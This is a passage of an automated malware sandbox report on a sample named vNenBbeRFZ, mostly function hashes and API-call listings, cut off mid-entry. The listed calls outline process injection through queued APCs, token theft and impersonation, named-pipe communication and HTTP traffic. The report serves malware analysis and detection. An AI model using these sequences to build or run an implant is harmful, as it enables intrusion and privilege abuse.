Function 03991ACB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 4467e29e5aaefc22302d451395adc070568b12134dce2f4ff5da8f6345a833ed
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: FFD16C73D0A9F30AAF36C2AD406817EEAA67FD159031EC7E39CD46F289D2265D10D6D0

Function 03D92271 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: f60fb0cd8249cb5b0ade03992aa76c23bcee9735a93df1fb5c8d242c0762e21d
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: F4C16073C0A9B74A9B75C12D416823BEFA26FC5A9131FCBE2CCD43F289D2269D0495D0

Function 039916BF Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 37cdfac2703abe87618a5897dfde01178ee0c25204f764f4b892aa21f4052903
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 44C16D73C0A9F30AAF36C16E446817EEA667FD169131FC7E29CD43F28992265D04D5D0

Function 03D91E9D Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 73dbcb86b6113f8755306ca16defb456de507ab14b1b4d3847205537d77a96e1
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 37C17F73D0E9B74AAB35C12D455823BEEA26FC1A8031FCBE39CD43F289D6269D1585D0

Function 039912EB Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 6d7a70d4effbf9afa3fdb91a306704d090a650010b75262852b5a1dcedb76aa7
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: EDC15C73D0A9F34AAF36C16D446827EEAA67FD168131FC7E28CD46F289D6269D00C5D0

Function 03D7A2E1 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: 2e990df1aa265b3e1529da2525a8e7f993ee92a598749a2f07e2a10c60eb11ee
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 5791BFB4E0121ACFCF08CF98C5909AEBBB1FF48705F248199D915AB315E335AA81CF95

Function 03D79641 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: ee4ca0236269bc9155532f3942ad9a292c0bd18f9d560dcd6620682ff8d67515
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 1A919078E0121ACFCF18CF99C5A09AEBBB1BF48715F248159D9156B315D330AA81CF94

Function 03978A8F Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: f31c597ec5b3d6787f87c417407d0ad1c4808b12b8d29536a3b46b29b55e3edd
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: FD91CFB4E0520ACFCF08CF89C5959AEBBB6FF48315F288599D9116B355D330AA81CF94

Function 0397972F Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction ID: 52597303a700f8cd9e9e3fba2a9392e4c74f3577acaac246c3698066dccefab0
Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
Instruction Fuzzy Hash: 6B919C78E0120ACFCF08CF99C590AAEBBB1FF49315F248599D9156B355D331AA81CF94

Function 039A2802 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction ID: 0f767f0f63e1643e77d0a15bbe91194b892c37d399ae721012c8f97cdd1c2ed9
Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction Fuzzy Hash: 54419135A04A05DFCB19CF1DC880969BBF6FF89350B19C5ADE49A8B316D631E941CB90

Function 03D82BF1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 5f22bd8c0bdcc90d3ab0940ac464c37318571fcf8c6c4bfa148fdacbf1b5a0f6
Instruction ID: 58c809e8438036baab87e79d8b83d1817a023abfc152f36c7f25f6d35a6fe0b8
Opcode Fuzzy Hash: 5f22bd8c0bdcc90d3ab0940ac464c37318571fcf8c6c4bfa148fdacbf1b5a0f6
Instruction Fuzzy Hash: 0F415B76E00209AFDB04EFA9C881AAEB7F5FF48310F148579ED05EB341D634AA45CB60

Function 0398203F Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 6f49ffeb4de8a6dae6a4fbdb1799945e1415dc23d48da8c464bfb278c9a6bcc2
Instruction ID: ba6a27b28a04cc34e9dc0cfc9d0fdbe98b4deb8650e56d987d8ce81c501e47f8
Opcode Fuzzy Hash: 6f49ffeb4de8a6dae6a4fbdb1799945e1415dc23d48da8c464bfb278c9a6bcc2
Instruction Fuzzy Hash: 2E413E76E00209AFDB14EFA8CC81AAEB7B6EF88310F15857DE955EB345D634E901CB50

Function 03D949E5 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b069b619926c57cdbf50fe972dcac3fd0c6e74870d729bf544d34e355eb9d58
Instruction ID: bcc26c1e97b2feb20874fcdca1c9e377549f9a75f3c158e131741e97efcd4434
Opcode Fuzzy Hash: 4b069b619926c57cdbf50fe972dcac3fd0c6e74870d729bf544d34e355eb9d58
Instruction Fuzzy Hash: 7B41C4759140688FCF48DF9DE9908EDB7F2FB4D341B55811AE546BB389C638A910CF24

Function 03D777BE Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 210networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 03D777F8
select.WS2_32(00000000,?,?,?,?), ref: 03D7785C
__WSAFDIsSet.WS2_32(00000000,?), ref: 03D77878
accept.WS2_32(00000000,00000000,00000000), ref: 03D7788D
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 03D778A0

Part of subcall function 03D771C4: _malloc.LIBCMT ref: 03D771CB
Part of subcall function 03D771C4: GetTickCount.KERNEL32 ref: 03D771EB

Part of subcall function 03D71683: _malloc.LIBCMT ref: 03D71689

Part of subcall function 03D716D3: htonl.WS2_32(0000001F), ref: 03D716D9

Part of subcall function 03D71765: _memset.LIBCMT ref: 03D71773

__WSAFDIsSet.WS2_32(00000000,?), ref: 03D7792D
accept.WS2_32(00000000,00000000,00000000), ref: 03D7793F
closesocket.WS2_32(?), ref: 03D77A4D

Strings

d, xrefs: 03D777D8

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
String ID: d
API String ID: 4083423528-2564639436
Opcode ID: 34354b3b2f5d268869059a37c917ddf0e5ed33fc8566cf642d953bac9f383c1f
Instruction ID: 0928b357e3a9f54957dfeca97e36970a649c1b0beba749a919706a1759aae503
Opcode Fuzzy Hash: 34354b3b2f5d268869059a37c917ddf0e5ed33fc8566cf642d953bac9f383c1f
Instruction Fuzzy Hash: B6713BB5C00708AFDB21EFA5CD44AAEB7BCFF44700F144AAAE555E6250F731AA45CB60

Function 03D73E1F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181processCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D73E4D
_memset.LIBCMT ref: 03D73E69

Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,03D7406E,00000400,?,03D73E93,03D7406E,?,00000400), ref: 03D72EAF
Part of subcall function 03D72E99: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,03D7406E,03D73E93,?,03D73E93,03D7406E,?,00000400,?,?,?,?,03D7406E), ref: 03D72EC8

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,03D7406E,03D77FC2,?,?,03D77FC2,03D78ED8,?), ref: 03D73EB3
GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,03D7406E,03D77FC2,?,?,03D77FC2,03D78ED8,?), ref: 03D73EC2
CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,F3E8296A,83FFFFE3), ref: 03D73EF0

Strings

system32, xrefs: 03D73FA5
sysnative, xrefs: 03D73F85

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
String ID: sysnative$system32
API String ID: 2486443368-2461298002
Opcode ID: 9ba3c32bfcd8ddc738e60bb967e5ec7cfc2b78977a859174ff2f1261ea72b031
Instruction ID: 976e12ae8e73092055b3fd8af404dc605fe98926a1c89118436aa6326721440c
Opcode Fuzzy Hash: 9ba3c32bfcd8ddc738e60bb967e5ec7cfc2b78977a859174ff2f1261ea72b031
Instruction Fuzzy Hash: AB511676604306AFD721EF64DC85EABB7ACEF05750F04082AE948C7250F731E9199BE2

Function 03D72730 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 147networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D7275B
_memset.LIBCMT ref: 03D72770
__snprintf.LIBCMT ref: 03D727AE
__snprintf.LIBCMT ref: 03D727CA
__snprintf.LIBCMT ref: 03D7282A
__snprintf.LIBCMT ref: 03D72841

Part of subcall function 03D85A26: __output_l.LIBCMT ref: 03D85AA8

HttpOpenRequestA.WININET(00000000,?,00000000,00000000,03D9E540,03DA6C58), ref: 03D7287E
HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 03D728A7
InternetCloseHandle.WININET(00000000), ref: 03D728B9
Sleep.KERNEL32(000001F4), ref: 03D728C0
InternetCloseHandle.WININET(00000000), ref: 03D728D1

Strings

*/*, xrefs: 03D7274B
%s%s, xrefs: 03D7283A

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$CloseHandleHttpInternetRequest_memset$OpenSendSleep__output_l
String ID: %s%s$*/*
API String ID: 894754388-856325523
Opcode ID: 2ed0ceb5c158c8775fb5ced2df8c965a14226c27f30e8139bd0bde85c1299e7d
Instruction ID: 497a2b519d638c8eea58c6f8294b1d4a08b08a70d5ada4587eff1478e926da64
Opcode Fuzzy Hash: 2ed0ceb5c158c8775fb5ced2df8c965a14226c27f30e8139bd0bde85c1299e7d
Instruction Fuzzy Hash: 8E41BF76800258BEDF11EBA4DC85DEE7B7EEF09304F0845A6E505BB251F7329A488B61

Function 03D75597 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 114threadsleepprocessCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,00000000,00000000), ref: 03D755DC
GetProcAddress.KERNEL32(00000000), ref: 03D755E3

Part of subcall function 03D7550C: _malloc.LIBCMT ref: 03D7552B
Part of subcall function 03D7550C: VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,?,00000000,00000000,00000000,00000000,?), ref: 03D7555E
Part of subcall function 03D7550C: WriteProcessMemory.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 03D75576

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 03D75612
Thread32First.KERNEL32(00000000,0000001C), ref: 03D75627
OpenThread.KERNEL32(001FFFFF,00000000,?,00000004,00000000), ref: 03D7564C
CloseHandle.KERNEL32(00000000), ref: 03D75669
Thread32Next.KERNEL32(00000000,0000001C), ref: 03D75672
CloseHandle.KERNEL32(00000000,00000004,00000000), ref: 03D7567E
Sleep.KERNEL32(000000C8), ref: 03D75685
ReadProcessMemory.KERNEL32(00000000,00000000,03D75200,00000010,03D754C2), ref: 03D75698
WriteProcessMemory.KERNEL32(00000000,00000000,03D75200,00000010,00000010), ref: 03D756C2

Strings

NtQueueApcThread, xrefs: 03D755C0
ntdll, xrefs: 03D755C7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: HandleMemoryProcess$CloseThread32Write$AddressAllocCreateFirstModuleNextOpenProcReadSleepSnapshotThreadToolhelp32Virtual_malloc
String ID: NtQueueApcThread$ntdll
API String ID: 4105558983-1374908105
Opcode ID: 4b2776bf1019e501e0fbb6382efbf9a949872583448f1e0ffe08e31f3ad196fd
Instruction ID: ea8134447e228bbbb52355e5abe1d533718f02d10dc2ccad571c8c8055e32e8c
Opcode Fuzzy Hash: 4b2776bf1019e501e0fbb6382efbf9a949872583448f1e0ffe08e31f3ad196fd
Instruction Fuzzy Hash: 68416072901318FFEF20EFA4DC45EAEBBB9EB0AB00F144416F905E6154E770AA44DB61

Function 03D7B8A0 Relevance: 21.1, APIs: 14, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32(?), ref: 03D7B8C5
htonl.WS2_32(00000000), ref: 03D7B8D5
OpenProcess.KERNEL32(00000400,00000000,00000000,?), ref: 03D7B8E4
GetLastError.KERNEL32 ref: 03D7B8F0
OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 03D7B912
GetLastError.KERNEL32 ref: 03D7B91C
ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 03D7B939
GetLastError.KERNEL32 ref: 03D7B93F
DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,03DAAEA4), ref: 03D7B95E
GetLastError.KERNEL32 ref: 03D7B968
ImpersonateLoggedOnUser.ADVAPI32 ref: 03D7B97A
GetLastError.KERNEL32 ref: 03D7B980
CloseHandle.KERNEL32(00000000), ref: 03D7B996
CloseHandle.KERNEL32(00000000), ref: 03D7B9A1

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseHandleImpersonateLoggedOpenProcessTokenUserhtonl$Duplicate
String ID:
API String ID: 2311469260-0
Opcode ID: 800211db1d3df61d048eb38647f1ff79d4886a999e9fa857ae781cd6b202b536
Instruction ID: 315e780e3e55dd4b6bde96231ee31ade26ef609c4bdabb84bf50a976ff5e79e0
Opcode Fuzzy Hash: 800211db1d3df61d048eb38647f1ff79d4886a999e9fa857ae781cd6b202b536
Instruction Fuzzy Hash: CA31B2B2940309BEEB11EBA1DC49F7A7AACEF05B55F180067F511E9294FB708D449B60

Function 03D7673A Relevance: 19.6, APIs: 13, Instructions: 94pipesleepfileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D76749
GetTickCount.KERNEL32 ref: 03D76753
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000,?,?,?,00000000,?,00000001,?,?,00000000), ref: 03D7676D
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D7677A
WaitNamedPipeA.KERNEL32(?,00002710), ref: 03D7678F
Sleep.KERNEL32(000003E8,?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D7679C
GetTickCount.KERNEL32 ref: 03D767A2
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D767B8
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D767C8
SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000,?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D767E6
GetLastError.KERNEL32(?,?,?,00000000,?,00000001,?,?,00000000,?,?,00000000), ref: 03D767F0
DisconnectNamedPipe.KERNEL32(?), ref: 03D7682A
CloseHandle.KERNEL32(?), ref: 03D76831

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$Handle$CloseCreateDisconnectFileSleepStateWait
String ID:
API String ID: 832653698-0
Opcode ID: 478fac1330ffe7a5a2f4ef47cd4deb6bfa3df7d5ad401373188bf57b2adfc47d
Instruction ID: 08b58f88753cdc3a0933b8f5d48d0a4d1de346f42f7ed2c91ef0a734fa9cfb78
Opcode Fuzzy Hash: 478fac1330ffe7a5a2f4ef47cd4deb6bfa3df7d5ad401373188bf57b2adfc47d
Instruction Fuzzy Hash: 5C21C772604A14BFEB00B7B5DC85BAD3AACEB05B60F144422F505FA5D0FB70D8445665

Function 00401E20 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 197COMMON

Download Yara Rule

Strings

4F@, xrefs: 00401EC1
4F@, xrefs: 00401EE3
4F@, xrefs: 00402030
@F@, xrefs: 00401F51
4F@, xrefs: 00401E9A
4F@, xrefs: 00402067
4F@, xrefs: 00401E7C
4F@, xrefs: 00401F91
4F@, xrefs: 00402035
4F@, xrefs: 00402078

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID:
String ID: 4F@$4F@$4F@$4F@$4F@$4F@$4F@$4F@$4F@$@F@
API String ID: 0-4155085231
Opcode ID: 23e14b166187202fe0a8571c64dd8e12ce787a5cb20c298fcbfa59114e6ee72f
Instruction ID: 035e81a57bfe633a06eea35fdf48bed792dee3a39659b034c763f591be88bba8
Opcode Fuzzy Hash: 23e14b166187202fe0a8571c64dd8e12ce787a5cb20c298fcbfa59114e6ee72f
Instruction Fuzzy Hash: 8E71C071A003018BCB00DF28D98425AB7F1FFC5384F15897AE948B73A5E739E916CB89

Function 03D775BD Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D775CE
select.WS2_32(00000000,00000000,?,?,00000000), ref: 03D77619
__WSAFDIsSet.WS2_32(00000000,?), ref: 03D77629
__WSAFDIsSet.WS2_32(00000000,?), ref: 03D7763C
GetTickCount.KERNEL32 ref: 03D77645
gethostbyname.WS2_32(03D7776C), ref: 03D77650
